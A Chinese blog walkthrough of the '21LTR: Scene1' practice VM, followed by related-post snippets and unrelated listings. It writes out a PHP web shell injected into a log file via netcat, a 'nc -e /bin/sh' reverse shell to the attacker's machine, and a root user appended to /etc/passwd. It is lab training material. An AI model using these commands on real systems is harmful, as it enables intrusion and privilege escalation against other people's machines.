21 LTR: Scene1

最新推荐文章于 2024-09-15 18:12:20 发布
最新推荐文章于 2024-09-15 18:12:20 发布
阅读量349 收藏 6
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80154010/article/details/142256356
版权

添加一张仅主机网卡

kali 自定义刚刚的net1仅主机模式

靶机

主机发现

arp-scan -l

端口扫描

nmap -sV -sC -sT 192.168.2.120 -p-

目录扫描

dirb http://192.168.2.120

浏览器访问

因为开启了80端口

f12查看页面元素 发现一个用户名和密码,因为开启了22端口我们直接finelshell连接

logs

zg]E-b0]+8:(58G

因为开启了21和22端口我们可以ftp或ssh连接

ftp 192.168.2.120

ls 查看有什么文件,我们发现一个具有root权限的文件

可以将这个文件下载到我们本地上

get backup_log.php /home/kali/Desktop/backup.php

cat backup.php

发现这是日志文件 ,可以结合扫描到的/logs目录做个拼接

getshell

因为backup_log.php文件可以解析,可以写入一句话木马

利用10001端口写入 ,需要多连接几遍才能连接上

nc -nv 192.168.2.120 10001

<?php system($_GET['cmd']) ?>

拼接参数值 , 写入反弹shell ,访问

?cmd=nc -e /bin/sh 192.168.2.128 8521 # kali ip ,开启一个监听端口

发现这是个低权限用户

提权

先建立交互式shell

python -c 'import pty; pty.spawn("/bin/sh")'

查看 /etc/passwd 发现可以查看

cat /etc/passwd

不安全配置的/etc/passwd 提权

在kali 利用 openssl 生成密码hash 值

openssl passwd 123456

将生成的hash密码模仿root的形式追加到/etc/passwd

echo 'king:$1$l8Arf5B1$gMeoPL4Ud0djF5.FoJ.FH1:0:0:root:/root:/bin/bash' >> /etc/passwd

提权成功

Gigity123
关注
21LTR: Scene 1靶机
m0_61995767的博客
07-30 604
21LTR: Scene 1打靶记录
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 447
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 393
21LTR:Scene1靶机,打靶文章
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 425
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
21LTR:Scene1靶机详情
xiaoyanglailo的博客
09-14 364
靶机下载链接:一、靶机搭建将靶机调到仅主机模式我这边是自己做了一张仅主机的网卡靶机的IP显示。
Hack the 21LTR: Scene 1
weixin_53626662的博客
08-15 274
是默认ip192.168.2.120,攻击机和靶机的网卡都设置成2段的仅主机模式。2.右击查看源码,显示账户名密码logs:zg]E-b0]+8:(58G。5.拼接/logs/backup_log.php。将backup_log.php下载到本机并查看。然后cat查看/etc/passwd,成功创建。5.查看用户文件,有hbeale用户。1.利用passwd文件可写进行提权。2.切换到刚刚创建的用户,提权成功。将新用户加入passwd文件。4.拼接/logs,无果。6.启动netcat会话。
21 LTR: Scene1 靶机-详细流程
m0_73983897的博客
09-15 1164
通过网页源码获取可用账号密码,也算是靶机的一种常见套路了,但是这个一般挺难注意到,以后在遇到瓶颈时,可以尝试通过查看网页源代码获取可用信息;FTP文件读取+获取shell 比较少见,但也提醒了我 发现可疑文件 + 目录扫描 ,这2者是紧密关联的;关于靶机给出的端口信息,一般情况下靶机是不会开无用的服务的,给出的端口信息,既是提示,也是突破口;FTP文件的读取和下载也是需要多做尝试的点,多换环境和方式,总会有可用的;发现开放 21,22,80端口,测试访问80端口。下载到本机(下载到kali也可以不影响)
vulnhub靶机:21 LTR: Scene1
weixin_68416970的博客
09-13 387
用 $1$Y3B2pavB$u.TqnuWsw.1L4ih3HAWk3. 替换 root:x:0:0::/root:/bin/bash 中的 x。拼接到刚才扫描到的 logs 目录下,发现可以访问到日志文件 /logs/backup_log.php。因为有ssh服务,就读取一下密钥,把密钥下载下来拖进 kali 桌面。连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件。修改靶机和 kali 攻击机网络模式为仅主机模式。,参考了一下其他文档,需要利用10001端口。查看页面源代码,发现账号和密码。
Hack the 21LTR: Scene 1 靶机
hqy250019的博客
07-30 389
在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell。cmd=id,尝试运行 id命令,发现得到回复。创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。将文件下载到我们的本地系统后,我们使用 cat 命令在kali中打开该文件。发现扫描都没有,右键查看源代码,获得了一些登录凭据。ls,发现一个backup_log.php文件。在网站路径上拼接/logs/,发现访问被拒绝。再尝试ftp连接,发现连接成功。尝试ssh连接,发现连接失败。
p720_ov2640_r58_dev拍照和录像都是720p的分辨率20160713_1430.7z
07-13
used_scene_mode = 1 key_support_scene_mode = auto,hdr key_default_scene_mode = auto used_white_balance = 1 key_support_white_balance = auto,incandescent,fluorescent,warm-fluorescent,daylight,cloudy-...
r58_bmi160_bma250_ov2640_dev点亮VGA的ov2640HDMI显示_20160630_1142.7z
06-30
used_scene_mode = 1 key_support_scene_mode = auto,hdr key_default_scene_mode = auto used_white_balance = 1 key_support_white_balance = auto,incandescent,fluorescent,warm-fluorescent,daylight,cloudy-...
文本检测:TextSnake方法的灵活场景文本表示及性能提升
TextSnake:一种检测任意形状龙尚邦1、 2[0000− 0002− 4089− 5369],阮家强1、 2,张文杰1、 2,、何新2、吴文浩 2、姚聪 21 2北京大学,旷视科技股份有限公司{longlongsb,阮家强,张文杰}@ pku.edu.cn,{hexin...
iOS 13 适配 ING...
wangletiancsdn的博客
10-17 1254
Xcode11 缺失库文件导入位置变更 libstdc-6.0.9 文件下载 Xcode11下 这个目录不存在了 /Applications/Xcode-beta.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/iOS.simruntim...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
健身房管理系统代码系统 Springboot健身房管理系统(程序,中文注释)
最新发布
09-26
健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统-健身房管理系统 1、资源说明:健身房管理系统源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、M
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
09-26
海思SDK及大量官方PDF文档:hi3516dv100 和RTP示例工程代码:HisiLive
电池镍片自动检测设备_三维3D设计图纸.zip
09-26
电池镍片自动检测设备_三维3D设计图纸.zip
小微园区数字化建设方案.pptx
09-26
小微园区数字化建设方案
ProtDec-LTR:学习排序提升蛋白质远程同源性检测
论文作者Bin Liu、Junjie Chen和Xiaolong Wang提出了一种名为ProtDec-LTR(Protein Decoder with Learning to Rank)的新方法。这种方法结合了学习排名的策略,目的是通过优化现有技术的组合来提高预测的准确性。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值